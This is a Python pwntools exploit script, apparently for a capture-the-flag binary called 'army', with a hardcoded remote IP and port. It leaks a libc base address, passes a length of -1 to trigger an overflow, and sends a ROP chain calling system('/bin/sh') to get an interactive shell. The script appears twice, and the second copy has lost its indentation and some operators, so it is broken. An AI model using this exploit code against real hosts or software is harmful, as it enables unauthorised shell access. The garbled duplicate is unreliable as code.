hama7230/exploit.py

## exploit.py
#!/usr/bin/env python
from pwn import *

context(terminal=['tmux', 'splitw', '-h'])  # horizontal split window

# libc = ELF('')
elf = ELF('./army')
context(os='linux', arch=elf.arch)
# context(log_level='debug')  # output verbose log

RHOST = "185.168.131.122"
RPORT = 6000
LHOST = "127.0.0.1"
LPORT = 6000

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

def dbg(ss):
    log.info("%s: 0x%x" % (ss, eval(ss)))

conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
if opt in 'rl':
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    gdbscript = """
    b* 0x400AED
    continue
    """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
    conn = gdb.debug(['./army'], gdbscript=gdbscript)
else:
    conn = process(['./army'])
    # conn = process(['./army'], env={'LD_PRELOAD': ''})
    if opt == 'a': gdb.attach(conn)

def join(name, h, w, a, d):
    conn.sendlineafter('3. I think I deserve a promotion', '1')
    conn.sendafter('Enter name:', name)
    conn.sendafter('Enter height:', str(h).ljust(4, '\x00'))
    conn.sendafter('Enter weight:', str(w).ljust(4, '\x00'))
    conn.sendafter('Enter length of answer:', str(a).ljust(4, '\x00'))
    conn.sendafter('Enter your description:', d)

def shit():
    conn.sendlineafter('3. I think I deserve a promotion', '2')

def think(p):
    conn.sendlineafter('3. I think I deserve a promotion', '3')
    conn.sendline(p)

# exploit
log.info('Pwning')

conn.recvuntil(' Luck : ')
libc_base = u64(conn.recv(6) + '\x00'*2) - 0x6f690
dbg('libc_base')

join('x'*0x10+p64(0)+p64(0x10), 100, 200, 0x68, 'y'*0x38)
think('hogehoge')

conn.sendlineafter('3. I think I deserve a promotion', '1')
conn.sendafter('Enter name:', 'hogehoge')
conn.sendafter('Enter height:', str(10).ljust(4, '\x00'))
conn.sendafter('Enter weight:', str(20).ljust(4, '\x00'))
conn.sendafter('Enter length of answer:', '-1'.ljust(4, '\x00'))

# ROP (pop_rdi + '/bin/sh' + system)
think('x'*0x48 + p64(0x00400d03) + p64(libc_base+0x18cd57)+p64(libc_base + 0x45390))
conn.interactive()
	#!/usr/bin/env python
	from pwn import *

	context(terminal=['tmux', 'splitw', '-h']) # horizontal split window

	# libc = ELF('')
	elf = ELF('./army')
	context(os='linux', arch=elf.arch)
	# context(log_level='debug') # output verbose log

	RHOST = "185.168.131.122"
	RPORT = 6000
	LHOST = "127.0.0.1"
	LPORT = 6000

	def section_addr(name, elf=elf):
	return elf.get_section_by_name(name).header['sh_addr']

	def dbg(ss):
	log.info("%s: 0x%x" % (ss, eval(ss)))

	conn = None
	opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
	if opt in 'rl':
	conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
	elif opt == 'd':
	gdbscript = """
	b* 0x400AED
	continue
	""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
	conn = gdb.debug(['./army'], gdbscript=gdbscript)
	else:
	conn = process(['./army'])
	# conn = process(['./army'], env={'LD_PRELOAD': ''})
	if opt == 'a': gdb.attach(conn)

	def join(name, h, w, a, d):
	conn.sendlineafter('3. I think I deserve a promotion', '1')
	conn.sendafter('Enter name:', name)
	conn.sendafter('Enter height:', str(h).ljust(4, '\x00'))
	conn.sendafter('Enter weight:', str(w).ljust(4, '\x00'))
	conn.sendafter('Enter length of answer:', str(a).ljust(4, '\x00'))
	conn.sendafter('Enter your description:', d)

	def shit():
	conn.sendlineafter('3. I think I deserve a promotion', '2')

	def think(p):
	conn.sendlineafter('3. I think I deserve a promotion', '3')
	conn.sendline(p)

	# exploit
	log.info('Pwning')

	conn.recvuntil(' Luck : ')
	libc_base = u64(conn.recv(6) + '\x00'*2) - 0x6f690
	dbg('libc_base')

	join('x'0x10+p64(0)+p64(0x10), 100, 200, 0x68, 'y'0x38)
	think('hogehoge')

	conn.sendlineafter('3. I think I deserve a promotion', '1')
	conn.sendafter('Enter name:', 'hogehoge')
	conn.sendafter('Enter height:', str(10).ljust(4, '\x00'))
	conn.sendafter('Enter weight:', str(20).ljust(4, '\x00'))
	conn.sendafter('Enter length of answer:', '-1'.ljust(4, '\x00'))

	# ROP (pop_rdi + '/bin/sh' + system)
	think('x'*0x48 + p64(0x00400d03) + p64(libc_base+0x18cd57)+p64(libc_base + 0x45390))
	conn.interactive()